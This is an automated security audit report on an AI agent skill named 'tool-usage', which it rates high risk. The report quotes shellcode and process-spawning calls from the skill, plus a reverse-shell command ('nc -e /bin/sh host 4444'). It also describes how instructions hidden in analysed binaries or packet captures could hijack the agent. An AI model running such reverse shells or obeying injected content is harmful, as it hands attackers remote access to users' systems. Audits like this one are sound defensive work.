NYC
skills/smithery/ai/tool-usage/Gen Agent Trust Hub

tool-usage

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (MEDIUM): The documentation includes instructions for spawning local processes, attaching debuggers, and generating shellcode (e.g., process('./target'), gdb.attach(p), shellcraft.sh()). These patterns are standard for security research but constitute a high-privilege execution surface if an attacker can influence the inputs to these commands.
  • [DATA_EXFILTRATION] (MEDIUM): The skill documents methods for creating reverse shells and network connections (e.g., remote('host', port), nc -e /bin/sh host 4444, shellcraft.connect()). If the agent handles untrusted data that gets interpolated into these command templates, it could be coerced into exfiltrating local data to a remote listener.
  • [INDIRECT_PROMPT_INJECTION] (MEDIUM): The skill provides tools for analyzing external files and network traffic (Ghidra, tcpdump, pwntools). This creates an attack surface (Category 8) where malicious content within a target binary or packet capture could contain instructions intended to exploit the agent's logic during analysis.
  • [SAFE_LISTING] (LOW): The automated scanner flagged 'libc.so' as malicious. In the context of this skill, 'libc.so' is a standard reference to the C standard library used for exploit development (Return-to-libc attacks) and is not a malicious URL or payload in itself.
Recommendations
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 06:21 AM